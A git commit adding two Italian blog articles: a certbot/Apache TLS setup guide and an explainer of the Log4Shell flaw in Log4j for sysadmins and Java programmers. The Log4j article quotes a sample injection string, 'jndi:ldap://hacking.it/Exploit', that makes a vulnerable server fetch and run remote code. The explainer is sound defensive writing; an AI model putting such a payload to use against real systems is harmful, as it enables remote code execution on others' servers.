From bd13286d87e6273db0f55e8fd95ba3730171def4 Mon Sep 17 00:00:00 2001 From: Alessandro Iezzi Date: Mon, 27 Dec 2021 15:58:27 +0100 Subject: Initial commit --- ...0210420_install-certificates-with-certbot.rhtml | 43 ++++++++++++++++++++++ ..._install-certificates-with-certbot.rhtml.config | 2 + .../20211213_log4shell-0-day-vulnerability.rhtml | 34 +++++++++++++++++ ...1213_log4shell-0-day-vulnerability.rhtml.config | 2 + 4 files changed, 81 insertions(+) create mode 100644 articles/2021/20210420_install-certificates-with-certbot.rhtml create mode 100644 articles/2021/20210420_install-certificates-with-certbot.rhtml.config create mode 100644 articles/2021/20211213_log4shell-0-day-vulnerability.rhtml create mode 100644 articles/2021/20211213_log4shell-0-day-vulnerability.rhtml.config (limited to 'articles/2021') diff --git a/articles/2021/20210420_install-certificates-with-certbot.rhtml b/articles/2021/20210420_install-certificates-with-certbot.rhtml new file mode 100644 index 0000000..c60ad39 --- /dev/null +++ b/articles/2021/20210420_install-certificates-with-certbot.rhtml @@ -0,0 +1,43 @@ +

Installare certificati con certbot

+

Alessandro Iezzi, 20 aprile 2021

+

Introduzione

+

In questo articolo si vedrà come installare certbot su una macchina + dotata di distruzione GNU/Linux Debian.

+ + +

Installazione

+
# apt-get install certbot
+ + +

Generare il certificato

+
# certbot certonly --apache
+ + +

Rinnovo automatico

+

Il pacchetto certbot sul tuo sistema viene fornito con un job di cron o + un timer di systemd che rinnoverà i certificati aumaticamente prima che + scadano. Non ci sarà bisogno di avviare certbot nuovamente. A meno che + non si cambiano le configurazioni. Si può verificare il rinnovo + automatico per i certificati eseguendo questo comando:

+
# certbot renew --dry-run
+ + +

Esempio di virtual host

+
<VirtualHost *:80>
+    ServerName ${DOMAIN}
+    Redirect permanent / https://${DOMAIN}/
+</VirtualHost>
+
+<VirtualHost *:443>
+    ServerAdmin ${ADMIN_EMAIL}
+    DocumentRoot ${DOCUMENT_ROOT}
+    ServerName ${DOMAIN}
+
+    ErrorLog ${APACHE_LOG_DIR}/error-${DOMAIN}.log
+    CustomLog ${APACHE_LOG_DIR}/access-${DOMAIN}.log combined
+
+    SSLCertificateFile /etc/letsencrypt/live/${DOMAIN}/fullchain.pem
+    SSLCertificateKeyFile /etc/letsencrypt/live/${DOMAIN}/privkey.pem
+    Include /etc/letsencrypt/options-ssl-apache.conf
+</VirtualHost>
+ diff --git a/articles/2021/20210420_install-certificates-with-certbot.rhtml.config b/articles/2021/20210420_install-certificates-with-certbot.rhtml.config new file mode 100644 index 0000000..e13ae32 --- /dev/null +++ b/articles/2021/20210420_install-certificates-with-certbot.rhtml.config @@ -0,0 +1,2 @@ +title = "Installare certificati con certbot" +pageName = home diff --git a/articles/2021/20211213_log4shell-0-day-vulnerability.rhtml b/articles/2021/20211213_log4shell-0-day-vulnerability.rhtml new file mode 100644 index 0000000..cca7617 --- /dev/null +++ b/articles/2021/20211213_log4shell-0-day-vulnerability.rhtml @@ -0,0 +1,34 @@ +

Gravi vulnerabilità in Log4j

+
+

Alessandro Iezzi, 13 dicembre 2021

+

Questa vulnerabilit\à interessa solo amministratori + di sistema e programmatori Java e non i normali utenti.

+ +

La modalità di attacco è molto semplice. Molte volte, si + tende a scrivere log di questo tipo: + log.info("User input: {}", userInput) e non c'è nulla + di sbagliato. Se l'utente prova ad inviare una stringa formata, per esempio, + in questo modo: jndi:ldap://hacking.it/Exploit entra in azione + la classe JndiLookup di log4j-core. La libreria, + effettua una chiamata verso quel server LDAP che gli risponderà con + l'URL di un sito web contenente l'exploit. L'exploit verrà eseguito + sul server da Log4j, rendendo inutili strumenti quali firewall e IDS/IPS. +

+ +

Alcuni utenti su GitHub avevano messo esempi di attacco ma + ad oggi (16 dicembre 2021) sono spariti. Se effettuate qualche ricerca, + forse riuscite a trovare ancora qualcosa.

+ +

Ho sentito un'intervista alla radio, l'intervistato + consigliava di aggiornare varie applicazioni mobile e sul computer + nonché il sistema operativo. Questi consigli valgono sempre, + a prescindere dalle vulnerabilità, in questo caso, l'utente tipico + NON deve fare assolutamente nulla, visto che la problematica riguarda noi + programmatori e amministratori di sistema.

+ +

Riferimenti

+ +
diff --git a/articles/2021/20211213_log4shell-0-day-vulnerability.rhtml.config b/articles/2021/20211213_log4shell-0-day-vulnerability.rhtml.config new file mode 100644 index 0000000..65718b8 --- /dev/null +++ b/articles/2021/20211213_log4shell-0-day-vulnerability.rhtml.config @@ -0,0 +1,2 @@ +title = "Gravi vulnerabilità in Log4j" +pageName = home -- cgit v1.2.3